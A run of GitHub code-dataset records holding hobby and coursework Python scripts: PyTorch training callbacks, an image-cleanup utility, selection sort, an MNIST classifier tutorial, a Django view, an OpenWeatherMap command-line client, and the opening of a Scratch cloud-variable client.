optimizer_name] = optimizer_instance.state_dict()\n else:\n checkpoint['optimizer'] = optimizer.state_dict()\n\n filepath = join(self.dirpath, 'model_checkpoint.LAST.pth')\n torch.save(checkpoint, filepath)\n if np.mod(epoch, self.save_model_frequency) == 0:\n 
filepath = join(self.dirpath, 'model_checkpoint.' + str(epoch) + '.pth')\n torch.save(checkpoint, filepath)\n\n\n def on_train_fi(self, model, **kwargs):\n checkpoint = {}\n if isinstance(model, dict):\n for model_name, model_instance in model.items():\n checkpoint['state_dict_' + model_name] = model_instance.state_dict()\n else:\n checkpoint['state_dict'] = model.state_dict()\n\n filepath = join(self.dirpath, 'model_checkpoint.FI.pth')\n torch.save(checkpoint, filepath)\n\n\nclass PrinterCallback(Callback):\n\n def __init__(self, keys=None):\n self.keys = keys\n self.logs = {}\n\n def on_train_init(self, model, **kwargs):\n print('######################################')\n print('########## Training started ##########')\n print('######################################')\n print('\\n')\n\n def on_epoch_init(self, model, epoch, **kwargs):\n print('------------- Epoch: ' + str(epoch))\n\n def on_step_fi(self, logs_dict, model, epoch, **kwargs):\n to_print = 'Iteration: (' + str(kwargs['iteration']) + '/' + str(kwargs['N']) + '). ' + \\\n ', '.join([k + ': ' + str(round(v, 3)) for k, v in logs_dict.items()])\n print(to_print)\n def on_epoch_fi(self, logs_dict, model, epoch, **kwargs):\n to_print = 'Epoch summary: ' + ','.join([k + ': ' + str(round(v, 3)) for k, v in logs_dict.items()])\n print(to_print)\n\n\n def on_train_fi(self, model, **kwargs):\n print('#######################################')\n print('########## Training finished ##########')\n print('#######################################')\n\n\nclass ToCSVCallback(Callback):\n\n def __init__(self, filepath, keys, attach=False):\n mode = 'a' if attach else 'w'\n fieldnames = ['Phase','epoch','iteration'] + keys\n write_header = True\n if exists(filepath) and attach:\n write_header = False\n csvfile = open(filepath, mode)\n self.csvwriter = csv.DictWriter(csvfile, fieldnames)\n\n if write_header:\n self.csvwriter.writeheader()\n\n\n\n def on_step_fi(self, logs_dict, model, epoch, **kwargs):\n write_dict = {**{'Phase': 'Train', 'epoch':epoch, 'iteration':kwargs['iteration']}, **logs_dict}\n self.csvwriter.writerow(write_dict)\n\n def on_epoch_fi(self, logs_dict, model, epoch, **kwargs):\n write_dict = {**{'Phase': 'Validation', 'epoch': epoch}, **logs_dict}\n self.csvwriter.writerow(write_dict)\n\n\nclass LRDecay(Callback):\n\n def __init__(self, optimizer, n_iter_start, n_iter_finish, lr_fi=0.75):\n self.optimizer = optimizer\n self.n_iter_start = n_iter_start\n self.n_iter_finish = n_iter_finish\n self.optimizer = optimizer\n self.lr_init = optimizer.param_groups[0]['lr']\n self.lr_fi = lr_fi\n\n def on_train_init(self, model, **kwargs):\n init_epoch = kwargs['starting_epoch'] if 'starting_epoch' in kwargs.keys() else 0\n if init_epoch >= self.n_iter_start:\n updated_lr = (1 - self.lr_fi * (init_epoch - self.n_iter_start)/(self.n_iter_finish-self.n_iter_start)) * self.lr_init\n updated_lr = max(updated_lr, self.lr_init*self.lr_fi)\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = updated_lr\n\n def on_epoch_init(self, model, epoch, **kwargs):\n if epoch >= self.n_iter_start:\n updated_lr = (1 - self.lr_fi * (epoch - self.n_iter_start)/(self.n_iter_finish-self.n_iter_start)) * self.lr_init\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = updated_lr\n\n\n\n","repo_name":"acasamitjana/SynthByReg","sub_path":"src/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} 
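The callbacks record above (src/callbacks.py) defines the hook API (on_train_init, on_epoch_init, on_step_fi, on_epoch_fi, on_train_fi) but ships no driver loop. A minimal sketch of a training loop exercising those hooks follows; the linear model, random batches, and epoch/step counts are hypothetical, and it assumes the History and PrinterCallback classes from that record are in scope:

import torch
import torch.nn as nn

# hypothetical toy model and optimizer; any nn.Module fits this callback API
model = nn.Linear(10, 1)
optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
callbacks = [History(keys=['loss']), PrinterCallback()]

for cb in callbacks:
    cb.on_train_init(model)
for epoch in range(2):
    for cb in callbacks:
        cb.on_epoch_init(model, epoch)
    for it in range(5):  # 5 hypothetical steps per epoch
        x, y = torch.randn(8, 10), torch.randn(8, 1)
        loss = nn.functional.mse_loss(model(x), y)
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        for cb in callbacks:
            # PrinterCallback reads kwargs['iteration'] and kwargs['N']
            cb.on_step_fi({'loss': loss.item()}, model, epoch, iteration=it, N=5)
    for cb in callbacks:
        cb.on_epoch_fi({'loss': loss.item()}, model, epoch, optimizer=optimizer)
for cb in callbacks:
    cb.on_train_fi(model)

ModelCheckpoint would also fit this loop (it reads kwargs['optimizer'] in on_epoch_fi), but is omitted here to avoid filesystem writes in a sketch.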
+{"seq_id":"23331645334","text":"import glob\nimport os\nlist1=glob.glob('*.html')\n# print(list1)\n\n#with open('slides.qmd', 'r') as file:\nwith open('../slides.ipynb', 'r') as file:\n text = file.read() \n\nfor filename in list1: \n if filename not in text:\n print(\"not found (removing)\", filename)\n os. remove(filename)\n # else:\n # print(\"found\",filename)\n","repo_name":"5cminsuhlim/ANLY503","sub_path":"lecs/3.13/W08-2023-plotly/img/clean-up-images.py","file_name":"clean-up-images.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14169177321","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 9 10:11:58 2018\r\n\r\n@author: Student\r\n\"\"\"\r\n#selection sort\r\nL = [5,6,7,1,4,2,9,8,3]\r\n\r\n'''\r\nwhile(len(L) >0):\r\n minPos = 0\r\n minVal = L[minPos]\r\n for i in range(len(L)):\r\n if minVal > L[i]:\r\n minPos = i\r\n minVal = L[minPos]\r\n O.append(minVal) \r\n L.pop(minPos)\r\n '''\r\n#selection sort in memory\r\nstart = 0\r\nwhile start < len(L):\r\n minPos = start\r\n minVal = L[minPos]\r\n for i in range(start,len(L)):\r\n if minVal > L[i]:\r\n minPos = i\r\n minVal = L[minPos]\r\n L[start],L[minPos] = L[minPos],L[start]\r\n start += 1\r\n ","repo_name":"fordzii/60021346","sub_path":"inclassroom/test_IDE_spyder3.py","file_name":"test_IDE_spyder3.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32273167839","text":"import sys\nimport sklearn\n\nimport numpy as np\nimport os\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.model_selection import cross_val_score, StratifiedKFold, cross_val_predict\nfrom sklearn.base import clone, BaseEstimator\nfrom sklearn.metrics import confusion_matrix, precision_score, recall_score, f1_score, precision_recall_curve\nfrom sklearn.svm import SVC\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.preprocessing import StandardScaler\n\nnp.random.seed(42)\n\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"classification\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\nos.makedirs(IMAGES_PATH, exist_ok=True)\n\n\ndef save_fig(fig_id, tight_layout=True, fig_extension=\"png\", resolution=300):\n path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n print(\"Saving figure\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=fig_extension, dpi=resolution)\n\n\nmnist = fetch_openml('mnist_784', version=1)\nprint(mnist.keys())\n\nX, y = mnist[\"data\"], mnist[\"target\"]\nprint(X.shape)\nprint(y.shape)\n\nsome_digit = X[0]\nsome_digit_image = some_digit.reshape(28, 28)\nplt.imshow(some_digit_image, cmap=mpl.cm.binary)\nplt.axis(\"off\")\n\nsave_fig(\"some_digit_plot\")\nplt.show()\n\n# casting the Y value into an int as the np array returns the value as a string\ny = y.astype(np.uint8)\n\n\ndef plot_digits(data):\n image = data.reshape(28 * 28)\n plt.imshow(image, cmap=mpl.cm.binary\n , interpolation=\"nearest\")\n plt.axis = \"off\"\n\n\ndef plot_digits(instances, images_per_row=10, **options):\n size = 28\n images_per_row = min(len(instances), images_per_row)\n images = [instance.reshape(size, size) for instance in instances]\n n_rows = (len(instances) 
- 1) // images_per_row + 1\n row_images = []\n n_empty = n_rows * images_per_row - len(instances)\n images.append(np.zeros((size, size * n_empty)))\n for row in range(n_rows):\n rimages = images[row * images_per_row:(row + 1) * images_per_row]\n row_images.append(np.concatenate(rimages, axis=1))\n image = np.concatenate(row_images, axis=0)\n plt.imshow(image, cmap=mpl.cm.binary, **options)\n plt.axis(\"off\")\n\n\nplt.figure(figsize=(9, 9))\nexample_images = X[:100]\nplot_digits(example_images, images_per_row=10)\nsave_fig(\"more_digits_plot\")\nplt.show()\n\nX_train, X_test, y_train, y_test = X[:60000], X[60000:], y[:60000], y[60000:]\n\ny_train_5 = (y_train == 5)\ny_test_5 = (y_test == 5)\n\nsgd_clf = SGDClassifier(max_iter=1000, tol=1e-3, random_state=42)\nsgd_clf.fit(X_train, y_train_5)\n\nsgd_clf.predict([some_digit])\n\ncross_val_score(sgd_clf, X_train, y_train_5, cv=3, scoring=\"accuracy\")\n\nskfolds = StratifiedKFold(n_splits=3, random_state=42)\n\nfor train_index, test_index in skfolds.split(X_train, y_train_5):\n clone_clf = clone(sgd_clf)\n X_train_folds = X_train[train_index]\n y_train_folds = y_train_5[train_index]\n X_test_folds = X_train[test_index]\n y_test_folds = y_train_5[test_index]\n\n clone_clf.fit(X_train_folds, y_train_folds)\n y_pred = clone_clf.predict(X_test_folds)\n n_correct = sum(y_pred == y_test_folds)\n print(n_correct / len(y_pred))\n\n\nclass Never5Classifier(BaseEstimator):\n def fit(self, X, y=None):\n pass\n\n def predict(self, X):\n return np.zeros((len(X), 1), dtype=bool)\n\n\nnever_5_classifier = Never5Classifier()\nprint(cross_val_score(never_5_classifier, X_train, y_train_5, cv=3, scoring=\"accuracy\"))\n\ny_train_pred = cross_val_predict(sgd_clf, X_train, y_train_5, cv=3)\n\nprint(confusion_matrix(y_train_5, y_train_pred))\n\ny_train_perfect_predictions = y_train_5\nprint(confusion_matrix(y_train_5, y_train_perfect_predictions))\nprint(precision_score(y_train_5, y_train_pred))\nprint(recall_score(y_train_5, y_train_pred))\nprint(f1_score(y_train_5, y_train_pred))\ny_scores = sgd_clf.decision_function([some_digit])\nprint(y_scores)\nthreshold = 0\ny_some_digit_pred = (y_scores > threshold)\nprint(y_some_digit_pred)\nthreshold = 8000\ny_some_digit_pred = (y_scores > threshold)\nprint(y_some_digit_pred)\n\ny_scores = cross_val_predict(sgd_clf, X_train, y_train_5, cv=3, method=\"decision_function\")\n\nprecisions, recalls, thresholds = precision_recall_curve(y_train_5, y_scores)\n\n\ndef plot_precision_recall_vs_threshold(precisions, recalls, thresholds):\n plt.plot(thresholds, precisions[:-1], \"b--\", label=\"Precision\", linewidth=2)\n plt.plot(thresholds, recalls[:-1], \"g-\", label=\"Recall\", linewidth=2)\n plt.legend(loc=\"center right\", fontsize=16) # Not shown in the book\n plt.xlabel(\"Threshold\", fontsize=16) # Not shown\n plt.grid(True) # Not shown\n plt.axis([-50000, 50000, 0, 1]) # Not shown\n\n\nrecall_90_precision = recalls[np.argmax(precisions >= 0.90)]\nthreshold_90_precision = thresholds[np.argmax(precisions >= 0.90)]\n\nplt.figure(figsize=(8, 4)) # Not shown\nplot_precision_recall_vs_threshold(precisions, recalls, thresholds)\nplt.plot([threshold_90_precision, threshold_90_precision], [0., 0.9], \"r:\") # Not shown\nplt.plot([-50000, threshold_90_precision], [0.9, 0.9], \"r:\") # Not shown\nplt.plot([-50000, threshold_90_precision], [recall_90_precision, recall_90_precision], \"r:\") # Not shown\nplt.plot([threshold_90_precision], [0.9], \"ro\") # Not shown\nplt.plot([threshold_90_precision], [recall_90_precision], \"ro\") # Not 
shown\nsave_fig(\"precision_recall_vs_threshold_plot\") # Not shown\nplt.show()\n\nprint((y_train_pred == (y_scores > 0)).all())\n\n\ndef plot_precision_vs_recall(precisions, recalls):\n plt.plot(recalls, precisions, \"b-\", linewidth=2)\n plt.xlabel(\"Recall\", fontsize=16)\n plt.ylabel(\"Precision\", fontsize=16)\n plt.axis([0, 1, 0, 1])\n plt.grid(True)\n\n\nplt.figure(figsize=(8, 6))\nplot_precision_vs_recall(precisions, recalls)\nplt.plot([0.4368, 0.4368], [0., 0.9], \"r:\")\nplt.plot([0.0, 0.4368], [0.9, 0.9], \"r:\")\nplt.plot([0.4368], [0.9], \"ro\")\nsave_fig(\"precision_vs_recall_plot\")\nplt.show()\n\nsvm_clf = SVC(gamma=\"auto\", random_state=42)\nsvm_clf.fit(X_train[:1000], y_train[:1000])\nsvm_clf.predict([some_digit])\n\nsome_digit_score = svm_clf.decision_function([some_digit])\nprint(some_digit_score)\nprint(np.argmax(some_digit_score))\nprint(svm_clf.classes_)\nprint(svm_clf.classes_[5])\n\novr_clf = OneVsRestClassifier(SVC(gamma=\"auto\", random_state=42))\novr_clf.fit(X_train[:1000], y_train[:1000])\novr_clf.predict([some_digit])\nprint(len(ovr_clf.estimators_))\nsgd_clf.fit(X_train, y_train)\nprint(sgd_clf.predict([some_digit]))\nprint(sgd_clf.decision_function([some_digit]))\n\ncross_val_score(sgd_clf, X_train, y_train, cv=3, scoring=\"accuracy\")\nscaler = StandardScaler()\nX_train_scaled = scaler.fit_transform(X_train.astype(np.float64))\ncross_val_score(sgd_clf, X_train_scaled, y_train, cv=3, scoring=\"accuracy\")\n\ny_train_pred = cross_val_predict(sgd_clf, X_train_scaled, y_train, cv=3)\nconf_mx = confusion_matrix(y_train, y_train_pred)\nprint(conf_mx)\n\nplt.matshow(conf_mx, cmap=plt.cm.gray)\nsave_fig(\"confusion_matrix_plot\", tight_layout=False)\nplt.show()","repo_name":"toushi100/Tensorfow-in-Practice","sub_path":"chapter 2 classification.py","file_name":"chapter 2 classification.py","file_ext":"py","file_size_in_byte":7128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3120190620","text":"from django.shortcuts import render\nfrom datetime import datetime\n# Create your views here.\n\ndef index(request,name):\n now = datetime.now()\n context = {\n \"name\":name.capitalize(),\n \"isIndependence\": now.month==8 and now.day==14\n }\n return render(request,'wishindependenceday/index.html',context)","repo_name":"Tahir-Siddique/Web-Technologies-Practice","sub_path":"independence_day/wishindependenceday/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10204122528","text":"import requests\r\nimport argparse\r\nimport datetime\r\nimport os\r\nfrom pprint import pprint\r\n\r\n#test to see if CI works........................pip\r\ndef mocked_requests_get(*args, **kwargs):\r\n class MockResponse:\r\n def __init__(self, json_data):\r\n self.json_data = json_data\r\n\r\n def json(self):\r\n return self.json_data\r\n\r\n\r\n if (args[0] == \"http://api.openweathermap.org/data/2.5/weather?q=London&units=metric&appid=9faea4c243f8e74d846cc455fbbd810f\"):\r\n\r\n # London\r\n return MockResponse({\"coord\":{\"lon\":-0.13,\"lat\":51.51},\r\n \"weather\":[{\"id\":500,\"main\":\"Rain\",\"description\":\"light rain\",\"icon\":\"10n\"}],\r\n \"base\":\"stations\",\r\n \"main\":{\"temp\":10.1,\"pressure\":1005,\"humidity\":81,\"temp_min\":7.78,\"temp_max\":12.22},\r\n \"visibility\":10000,\"wind\":{\"speed\":1.5},\"rain\":{\"1h\":0.25},\"clouds\":{\"all\":17},\"dt\":1571187011,\r\n 
\"sys\":{\"type\":1,\"id\":1414,\"country\":\"GB\",\"sunrise\":1571207117,\"sunset\":1571245602},\r\n \"timezone\":0,\"id\":2643743,\"name\":\"London\",\"cod\":200})\r\n\r\n elif (args[0] == \"http://api.openweathermap.org/data/2.5/weather?id=4379545&units=imperial&appid=9faea4c243f8e74d846cc455fbbd810f\"):\r\n # California\r\n return MockResponse({\"coord\":{\"lon\":-92.57,\"lat\":38.63},\r\n \"weather\":[{\"id\":801,\"main\":\"Clouds\",\"description\":\"few clouds\",\"icon\":\"02n\"}],\r\n \"base\":\"stations\",\r\n \"main\":{\"temp\":56.55,\"pressure\":1015,\"humidity\":47,\"temp_min\":53.01,\"temp_max\":61},\r\n \"visibility\":16093,\"wind\":{\"speed\":17.22,\"deg\":320,\"gust\":26.4},\"clouds\":{\"all\":20},\"dt\":1571189504,\r\n \"sys\":{\"type\":1,\"id\":3686,\"country\":\"US\",\"sunrise\":1571141942,\"sunset\":1571182368},\r\n \"timezone\":0,\"id\":4379545,\"name\":\"California\",\"cod\":200})\r\n\r\n elif (args[0] == \"http://api.openweathermap.org/data/2.5/weather?lat=35.68&lon=139.76&units=metric&appid=9faea4c243f8e74d846cc455fbbd810f\"):\r\n # Tokyo\r\n return MockResponse({\"coord\": {\"lon\": 139.76, \"lat\": 35.68},\r\n \"weather\": [{\"id\": 803, \"main\": \"Clouds\", \"description\": \"broken clouds\", \"icon\": \"04d\"}],\r\n \"base\": \"stations\",\r\n \"main\": {\"temp\": 15.48, \"pressure\": 1026, \"humidity\": 72, \"temp_min\": 13.89, \"temp_max\": 17.22},\r\n \"visibility\": 10000, \"wind\": {\"speed\": 3.1, \"deg\": 10}, \"rain\": {}, \"clouds\": {\"all\": 75}, \"dt\": 1571186255,\r\n \"sys\": {\"type\": 1, \"id\": 8077, \"country\": \"JP\", \"sunrise\": 1571172444, \"sunset\": 1571213138},\r\n \"timezone\": 0, \"id\": 1850147, \"name\": \"Tokyo\", \"cod\": 200})\r\n\r\n elif (args[0] == \"http://api.openweathermap.org/data/2.5/weather?zip=3000,AU&units=metric&appid=9faea4c243f8e74d846cc455fbbd810f\"):\r\n # Melbourne\r\n return MockResponse({\"coord\":{\"lon\":144.96,\"lat\":-37.81},\r\n \"weather\":[{\"id\":803,\"main\":\"Clouds\",\"description\":\"broken clouds\",\"icon\":\"04d\"}],\r\n \"base\":\"stations\",\r\n \"main\":{\"temp\":14.97,\"pressure\":1010,\"humidity\":77,\"temp_min\":13.89,\"temp_max\":16.11},\r\n \"visibility\":10000,\"wind\":{\"speed\":4.6,\"deg\":360},\"clouds\":{\"all\":75},\"dt\":1571187042,\r\n \"sys\":{\"type\":1,\"id\":9554,\"country\":\"AU\",\"sunrise\":1571168063,\"sunset\":1571215023},\r\n \"timezone\":0,\"id\":0,\"name\":\"Melbourne\",\"cod\":200})\r\n\r\n print(args[0])\r\n return MockResponse(None)\r\n\r\n\r\n\r\ndef initialiseParser():\r\n # initialise parser for arguments parsing\r\n parser = argparse.ArgumentParser()\r\n\r\n # add compulsory arguments \"-api\"\r\n parser.add_argument(\"-api\", required=True,help=\"enter in following syntax, python openweather.py -api=xxx rest of arguments which will be further explainded\")\r\n\r\n # any location flag is mutually exclusive\r\n location = parser.add_mutually_exclusive_group()\r\n location.add_argument(\"-city\", \"--city\",help=\"Input location with city name add -city=city,countrycode(location can be inputted with one method only)\")\r\n location.add_argument(\"-cid\", \"--cid\",help=\"Input location with city name add -cid=(location can be inputted with one method only)\")\r\n location.add_argument(\"-gc\", \"--gc\", type=str, help=\"Input location with coordinates add -gc=\\\"lat,lon\\\"\")\r\n location.add_argument(\"-z\", \"--z\",help=\"Input location with zip code add -z=zipcode,countrycode(location can be inputted with one method only)\")\r\n\r\n # add optional 
arguments\r\n    parser.add_argument(\"-time\", \"--time\", action='store_true',help=\"displays date and time at which values are being shown\")\r\n    parser.add_argument(\"-temp\", \"--temp\", help=\"displays temperature range for current day; use -temp=fahrenheit for imperial units\")\r\n    parser.add_argument(\"-pressure\", \"--pressure\", action='store_true', help=\"displays pressure for current day\")\r\n    parser.add_argument(\"-cloud\", \"--cloud\", action='store_true', help=\"displays cloud data for current day\")\r\n    parser.add_argument(\"-humidity\", \"--humidity\", action='store_true', help=\"displays humidity for current day\")\r\n    parser.add_argument(\"-wind\", \"--wind\", action='store_true', help=\"displays wind data for current day\")\r\n    parser.add_argument(\"-sunset\", \"--sunset\", action='store_true', help=\"displays sunset time for current day\")\r\n    parser.add_argument(\"-sunrise\", \"--sunrise\", action='store_true', help=\"displays sunrise time for current day\")\r\n    parser.add_argument(\"-help\", action='store_true', help=\"displays help menu\")\r\n\r\n    return parser.parse_args() # return parsed arguments\r\n\r\n\r\ndef get_city_url(city, api):\r\n    # Monash University: Monash,AU\r\n    arg_city = str(city)\r\n\r\n    url = api + \"q=\" + arg_city\r\n    return url\r\n\r\n\r\ndef get_cid_url(cid, api):\r\n    # Monash University: 2157247\r\n    arg_cid = str(cid)\r\n\r\n    url = api + \"id=\" + arg_cid\r\n    return url\r\n\r\n\r\ndef get_gc_url(gc, api):\r\n    # Monash University: -34.23, 140.57\r\n    arg_gc = str(gc)\r\n    arg_gc = arg_gc.replace(' ', '')\r\n    lat, lon = arg_gc.split(',')\r\n\r\n    url = api + \"lat=\" + lat + \"&lon=\" + lon\r\n    return url\r\n\r\n    # valid: python .py -gc=\"-34.23,140.57\"\r\n\r\n\r\ndef get_z_url(z, api):\r\n    # Monash University: 3800,AU\r\n    arg_z = str(z)\r\n    arg_z = arg_z.replace(' ', '')\r\n    zip_code, country_code = arg_z.split(',')\r\n\r\n    url = api + \"zip=\" + zip_code + \",\" + country_code\r\n    return url\r\n\r\nclass Weather():\r\n    def __init__(self, url, api, metric=True):\r\n        self.url = url\r\n        self.api = api\r\n        self.metric = metric\r\n        self.data = self.api_fetch()\r\n\r\n    def get_time(self):\r\n\r\n        # offset to location's current time\r\n        timezone_offset = self.data['timezone']\r\n        utc_time = datetime.datetime.utcnow() # initialise utc time\r\n\r\n        offset = datetime.timedelta(seconds=timezone_offset)\r\n        data_time = utc_time + offset\r\n\r\n        time_string = data_time.strftime('%Y-%m-%d %H:%M:%S') # format time to year-month-day hour:min:second\r\n\r\n        # concatenate readable syntax and return string\r\n        time_string = \"On {}. \".format(time_string)\r\n\r\n        return time_string\r\n\r\n\r\n    def get_temp(self):\r\n\r\n        # api returns temperature in fahrenheit or celsius (default)\r\n        temp_min = self.data['main']['temp_min']\r\n        temp_max = self.data['main']['temp_max']\r\n\r\n        # concatenate readable syntax\r\n        temp_string = \"The temperature ranges from {}-{}\".format(temp_min, temp_max)\r\n\r\n        # concatenate units\r\n        if self.metric is False:\r\n            temp_string += \" fahrenheit. \"\r\n        else:\r\n            temp_string += \" celsius. \"\r\n\r\n        return temp_string\r\n\r\n\r\n    def get_humidity(self):\r\n\r\n        # api returns humidity in % and a weather description string\r\n        humidity = self.data['main']['humidity']\r\n        description = self.data['weather'][0]['description']\r\n\r\n        # concatenate readable syntax, units and return string\r\n        humidity_string = \"Weather conditions are likely {} with humidity of {}%. 
\".format(description, humidity)\r\n        return humidity_string\r\n\r\n\r\n    def get_cloud(self):\r\n\r\n        # api returns cloud cover in %\r\n        cloud = self.data['clouds']['all']\r\n\r\n        # concatenate readable syntax, units and return string\r\n        cloud_string = \"The percentage of clouds is {}%. \".format(cloud)\r\n        return cloud_string\r\n\r\n\r\n    def get_wind(self):\r\n\r\n        # api returns wind speed in miles/hour (imperial) or meters/sec (metric, default) and wind direction in degrees\r\n        # reuse self.data instead of re-fetching; api_fetch() takes no arguments\r\n        wind_speed = self.data['wind']['speed']\r\n        wind_degrees = self.data['wind'].get('deg', 0) # 'deg' can be absent from the response (e.g. calm wind), default to 0\r\n\r\n        unit = \"miles/hour\" if self.metric is False else \"meters/sec\"\r\n        wind_string = \"The wind speed is {} {} from {} degrees. \".format(wind_speed, unit, wind_degrees)\r\n\r\n        # concatenate readable syntax, units and return string\r\n        return wind_string\r\n\r\n\r\n    def get_pressure(self):\r\n\r\n        # api returns pressure in hPa\r\n        pressure = self.data['main']['pressure']\r\n\r\n        # concatenate readable syntax, units and return string\r\n        pressure_string = \"The pressure is {} hPa. \".format(pressure)\r\n        return pressure_string\r\n\r\n\r\n    def get_sunrise(self):\r\n        unix_utc = self.data['sys']['sunrise'] # api response in unix utc\r\n        utc_sunrise_time = datetime.datetime.utcfromtimestamp(unix_utc) # convert from unix utc to current utc time\r\n\r\n        # offset to location's current time\r\n        timezone_offset = self.data['timezone']\r\n        offset = datetime.timedelta(seconds=timezone_offset)\r\n        local_sunrise_time = utc_sunrise_time + offset\r\n\r\n        sunrise_string = local_sunrise_time.strftime('%H:%M:%S') # format time to hour:min:second\r\n\r\n        # concatenate readable syntax and return string\r\n        sunrise_string = \"Sunrise time is at {}. \".format(sunrise_string)\r\n        return sunrise_string\r\n\r\n\r\n    def get_sunset(self):\r\n        unix_utc = self.data['sys']['sunset'] # api response in unix utc\r\n        utc_sunset_time = datetime.datetime.utcfromtimestamp(unix_utc) # convert from unix utc to current utc time\r\n\r\n        # offset to location's current time\r\n        timezone_offset = self.data['timezone']\r\n        offset = datetime.timedelta(seconds=timezone_offset)\r\n        local_sunset_time = utc_sunset_time + offset\r\n\r\n        sunset_string = local_sunset_time.strftime('%H:%M:%S') # format time to hour:min:second\r\n\r\n        # concatenate readable syntax and return string\r\n        sunset_string = \"Sunset time is at {}. 
\".format(sunset_string)\r\n return sunset_string\r\n\r\n\r\n def api_fetch(self):\r\n # add units\r\n if self.metric is False:\r\n url = self.url + \"&units=imperial\"\r\n else:\r\n url = self.url + \"&units=metric\"\r\n\r\n api = \"&appid=\" + self.api # concatnate provided api key to comply with api call format\r\n url += api # append api key to url for api call\r\n response = requests.get(url) # api call\r\n data = response.json() # api response\r\n # pprint(data)\r\n\r\n return data\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # initialise arguments parsing\r\n args = initialiseParser()\r\n api = \"http://api.openweathermap.org/data/2.5/weather?\" # initialise api url for api call\r\n\r\n # invoke help menu and exit program without any error code\r\n if args.help:\r\n os.system(\"python3 \" + __file__ + \" --help\")\r\n exit()\r\n\r\n if args.city:\r\n url = get_city_url(args.city, api)\r\n\r\n elif args.cid:\r\n url = get_cid_url(args.cid, api)\r\n\r\n elif args.gc:\r\n url = get_gc_url(args.gc, api)\r\n\r\n elif args.z:\r\n url = get_z_url(args.z, api)\r\n\r\n else:\r\n # Case whereby user does not provide any location argument, exit with error code 1\r\n print(\"User must enter a location using either -city, -cid, -gc or -z\")\r\n exit(1)\r\n\r\n if args.temp == \"fahrenheit\":\r\n weather_object = Weather(url, args.api, False)\r\n else:\r\n weather_object = Weather(url, args.api)\r\n status_code = weather_object.data['cod']\r\n\r\n\r\n if (status_code == 200):\r\n r_string = \"\" # intialise return string\r\n\r\n if (args.humidity == False and args.pressure == False and args.temp == None and args.wind == False and\r\n args.cloud == False and args.sunrise == False and args.sunset == False and args.time == False):\r\n\r\n print(\"Enter a weather parameter\")\r\n exit(2)\r\n\r\n if args.time:\r\n r_string += weather_object.get_time()\r\n\r\n if args.temp:\r\n r_string += weather_object.get_temp()\r\n\r\n if args.humidity:\r\n r_string += weather_object.get_humidity()\r\n\r\n if args.cloud:\r\n r_string += weather_object.get_cloud()\r\n\r\n if args.wind:\r\n r_string += weather_object.get_wind()\r\n\r\n if args.pressure:\r\n r_string += weather_object.get_pressure()\r\n\r\n if args.sunrise:\r\n r_string += weather_object.get_sunrise()\r\n\r\n if args.sunset:\r\n r_string += weather_object.get_sunset()\r\n\r\n # print result string\r\n print(r_string)\r\n\r\n else:\r\n # print error message with error code\r\n print(\"Error: {}\".format(status_code))\r\n exit(int(status_code))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"sanaa-sys/OpenWeather-API","sub_path":"openweather.py","file_name":"openweather.py","file_ext":"py","file_size_in_byte":13523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27274545110","text":"try:\n import websocket #upm package(websocket-client)\nexcept ImportError:\n import os\n os.system(\"pip install websocket-client\")\nimport json\nimport requests\nfrom . 
import API_ERRORS\n\nclass cloud:\n    def __init__(self, info, project_id):\n        self.info = info\n        self.project_id = str(project_id)\n        self.ready = False\n    \n    def Open(self):\n        self.ws = websocket.WebSocket()\n        self.connect()\n\n        self.ready = True\n\n    def connect(self):\n        self.ws.connect(\"wss://clouddata.scratch.mit.edu\", cookie=f\"scratchsessionsid={self.info['sessid']};\", origin=\"https://scratch.mit.edu\", enable_multithread=True)\n\n        self.ws.send(f\"{json.dumps({'method': 'handshake', 'user': self.info['usr'], 'project_id': self.project_id})}\\n\")\n\n    def setVar(self, var, val):\n        var = f\"☁ {str(var)}\"\n        if self.ready:\n            try:\n                self.ws.send(f\"{json.dumps({'method': 'set', 'name': var, 'value': str(val), 'user': self.info['usr'], 'project_id': self.project_id})}\\n\")\n            except BrokenPipeError:\n                self.connect()\n                self.ws.send(f\"{json.dumps({'method': 'set', 'name': var, 'value': str(val), 'user': self.info['usr'], 'project_id': self.project_id})}\\n\")\n        else:\n            raise API_ERRORS.NotReady(\"Connection not open, try obj.Open()!\")\n    \n    def varExists(self, var):\n        return self.getVar(var) is not None\n\n    def getVar(self, var):\n        \n        res = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={self.project_id}&limit=1567&offset=0\")\n        while res.status_code == 502:\n            res = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={self.project_id}&limit=1567&offset=0\")\n\n        res = res.json()\n        var = f\"☁ {str(var)}\"\n        for i in res:\n            if var == i[\"name\"]:\n                return i[\"value\"]\n    \n    def close(self):\n        self.ws.close()\n\n    def encodeData(self, data : str):\n        